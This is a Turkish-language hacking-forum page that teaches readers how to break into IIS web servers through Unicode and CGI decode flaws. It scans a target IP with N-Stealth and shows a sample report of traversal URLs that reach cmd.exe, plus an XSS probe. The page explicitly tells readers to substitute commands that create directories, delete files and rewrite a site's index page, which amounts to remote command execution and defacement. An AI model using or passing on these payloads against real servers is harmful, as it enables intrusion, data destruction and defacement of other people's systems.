MENÜ |
|
Web Server Güvenliği
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
MSN Hack
|
|
|
Eğlence
|
|
|
MSN
|
|
|
|
|
Mp3
|
|
|
Program İndirme Bölümü
|
|
|
|
|
|
|
|
|
Diğer
|
|
|
|
|
|
|
%100 ÇaLışan Süper 2 Hack Yöntemi |
|
|
Cgi ve Uni Cod Açiklarindan en iyi Seklilde Faydalanmak için Scanner’inizin iyi Olmasi Gerek.
Yoksa Piyasada Bir çok cgi scan var, Zamaninda Hepside çok iyi di. Veritabanlarını Güncelleştirmeyen Scannerlar yeni açıklar karşında hiçte etkili olmayacaktır.
ve Açik Olmadigi Halde Basit Bir Logi Sayfasi Hakkinda açik var diye uyari Veriyorlar.
Tüm
Su An Piyasadaki En iyi Cgi Sanner N-Stealth (iP Portal Download Bölümden indirebilirsiniz)
Program Güzel Oldugu Kadar Türkçe Dil Destegininde Bulunmasi Arti Bir Özellik.
Simdi Adim Adim Bir Sisteme UniCod Açiklari Sayesinde Sizmayi Görecegiz.
Programi Kurduktan Sonra Dil Seçenekleri Çikacak Karsiniza Ordan Türkçeyi Seçin
Sunucu iP Adresi : Buraya Saldiracagimiz Hedef Sitenin ip Adresini Yaziyoruz.
(ip Adresini ögrenmek için siteye ping atin yeter c:>ping -t gibi illegalport.com ip adresi 66.111.48.66 )
ip Adresini Yazdiktan Sonra Tara Tusuna tiklamaniz yada Enter’a Basmaniz Yeterli.
Baglanti Hiziniza Bagli Olarak islem Biraz Sürecektir. (öneri olarak: önce Local Network’ünüzde Deneyebilirsiniz.
Tabiki Networkünüzdeki (Saldiracaginiz Makinada) Web Server Kurulu Olmali.
Bu Sekilde Sistemin isleyisini çok daha hizli görebilirsiniz.)
N-Stealth Bir Açik Buldugu Anda üstteki Gibi Muhtemel Yazlim Hatasi Bulundu diye bir uyari verecektir.
Hemen Sag Taraftaki Yeri Butonuna Tiklayarak Açigi Görebilirsiniz. Ama En iyisi Sonuna Kadar Beklemek.
Tarama Islemi Bittiginde Sistem Otomatik Olarak Size Html Formatinda Rapor Olusturacaktir.
Bu Raporun örnegini asagida görebilirsiniz.
Raporu html olarak Kaydedin.
Rapor Türkçedir ve Sistemdeki Açiklari, Risk Seviyelerini Size Gösterecektir.
ve html dosyasindan Direkt Çalistirabilmeniz için Hazir Linkler Olusturacaktir.
html olarak internet Explorer’dan oldugu gibi. Direk Program üzerinden de
bu açiklari Açik Butonuna Tiklayarak çalistirabilirsiniz.
Simdi En Can Alici Nokta : color=#000000http://10.0.0.8/msadc/..%c0%af..%c0%...../winnt/syste m32/cmd.exe?/c+dir+c:
(Bu Açiga Ait Bir Link)
Link in Sonunda +dir+c: bölümü var bütün is burda. dir yazan yere cdm.exe nin çalistirdigi tüm komutlari yazabilirsiniz.
Mesela Dizin Olusturmak için +md+c:dizinAdi
Dosya Silmek için +del+c:dosya adi
Diznler Arasi Geçis için Bildigimiz cd Komutunu kullanabiliriz +cd+c:Inetpubwwroot
wwroot a ulastikdan sonra index.htm - index.asp ye istediginizi yapin.
iste Örnek Bir N-Stealth Raporu
Default Kurulan Tüm IIS’lerde Bu Açiklar Var.
Raporda Risk Seviyeleri Belirtilmistir.
Rapor
Rapor XXXX (1X0.X0.0.XX
Tarih: 02.03.2003 19:04:14
Tarama kurallari: Normal
10.0.0.8
Sunumcu adi: XXXXX
Port: 80
Sunumcu: Microsoft-IIS/5.0
Sunumcu CGI aciklarina sahip olabilir. 160 item(s)
Special Request
Risk seviyesi: Alcak
Yeri: color=#000000http://10.0.0.8/%3cscript%3ealert’Can%20Cross%20Site% 20Attack’%3c/SCRIPT%3e.shtml
Cross-Site Scripting Vulnerability.
BLABLA Test
Risk seviyesi: Yuksek
Yeri: color=#000000http://10.0.0.8/blabla.idq SANS/FBI Top 20*
Possible Vulnerable ISAPI Extension
Special Request
Risk seviyesi: Orta
Yeri: color=#000000http://10.0.0.8/null.htw?CiWebHitsFi...obal.asa%20&Ci Restriction=none&CiHiliteType=Full
Common Vulnerability/Exposure.
Special Request
Risk seviyesi: Yuksek
Yeri: color=#000000http://10.0.0.8/msadc/..%5c..%5c...255c..%5cwin nt/system32/cmd.exe?/c+dir
IIS CGI Decode Vulnerability.
Special Request
Risk seviyesi: Yuksek
Yeri: color=#000000http://10.0.0.8/scripts/..%2f..%.....%2f..%2f. .%2f..%2fwinnt/system32/cmd.exe?/c+dir
IIS CGI Decode Vulnerability.
Special Request
MS IIS/PWS Escaped Characters Decoding Command Execution
CVE: CAN-2001-0333
Risk seviyesi: Yuksek
Yeri: color=#000000http://10.0.0.8/scripts/..%5c..%...stem32/cmd.exe ?/c+dir+c: BugTraq ID: 2708
Directory traversal vulnerability in IIS 5.0 and earlier allows remote attackers to execute arbitrary commands by encoding .. (dot dot) and characters twice.
Special Request
Risk seviyesi: Yuksek
Yeri: color=#000000http://10.0.0.8/msadc/..%2f..%2f...252fwinnt/syst em32/cmd.exe?/c+dir+c:
IIS Unicode Vulnerability.
Special Request
MS IIS/PWS Escaped Characters Decoding Command Execution
CVE: CAN-2001-0333
Risk seviyesi: Yuksek
Yeri: color=#000000http://10.0.0.8/msadc/..%5c../..%2...55c../winnt/sy stem32/cmd.exe?/c+dir+c: BugTraq ID: 2708
IIS Unicode Vulnerability.
Special Request
Risk seviyesi: Yuksek
Yeri: color=#000000http://10.0.0.8/msadc/..%c0%af..%c0%...../winnt/syste m32/cmd.exe?/c+dir+c:
IIS Unicode Vulnerability.
yorumlarınızı esirgemeyinnnnnnn
|
|
|
|
|
|
|
Bugün 31 ziyaretçi (42 klik) kişi burdaydı! |
|
|
|
|
|
|
|